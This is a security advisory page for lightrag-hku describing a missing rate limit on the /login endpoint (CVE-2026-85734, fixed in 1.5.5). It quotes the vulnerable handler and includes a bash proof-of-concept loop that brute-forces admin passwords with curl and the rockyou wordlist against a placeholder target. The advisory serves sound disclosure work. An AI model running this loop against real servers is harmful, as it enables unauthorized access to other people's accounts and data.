Skip to content
lightragGHSA-frch-4w6v-q5xx

lightrag-hku: No Rate Limiting on /login Endpoint Allows Brute-Force Attacks

Critical9.1CVE-2026-85734 · Published Sep 22, 2026

GitHub advisory

Affected versions

PackageAffectedFixed in
lightrag-hku
PyPI
< 1.5.51.5.5
Details and references

### Summary The POST /login endpoint has no rate limiting, account lockout, or delay on failed attempts. An attacker can submit unlimited password guesses at full network speed. ### Details ```python # lightrag/api/lightrag_server.py:2161 @app.post("/login") async def login(form_data: OAuth2PasswordRequestForm = Depends()): if not auth_handler.verify_password(username, form_data.password): raise HTTPException(status_code=401, detail="Incorrect credentials") # No: rate limit / lockout / backoff / CAPTCHA / attempt counter ``` A search for slowapi, rate_limit, lockout, or throttle in lightrag/api/ returns zero results. ### PoC ```bash # Brute-force /login with a wordlist, no throttling while IFS= read -r pass; do code=$(curl -s -o /dev/null -w "%{http_code}" \ -X POST http://<TARGET>:9621/login \ -d "username=admin&password=${pass}") [ "$code" = "200" ] && echo "[FOUND] $pass" && break done < /usr/share/wordlists/rockyou.txt ``` ### Impact Improper restriction of authentication attempts. Any network-reachable attacker can brute-force user passwords without restriction. Once credentials are recovered, the attacker gains full authenticated access to all documents, knowledge graph, and administrative operations.

CVSS 3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Severity from
GitHub (reviewed advisory)
Weakness
CWE-307
Also known as
CVE-2026-85734

More lightrag advisories

All

Critical advisories by email

Wednesdays: the week’s critical and high advisories in the AI and data stack, with the fixed versions. Only in weeks that have some.

Double opt-in. Unsubscribe any time.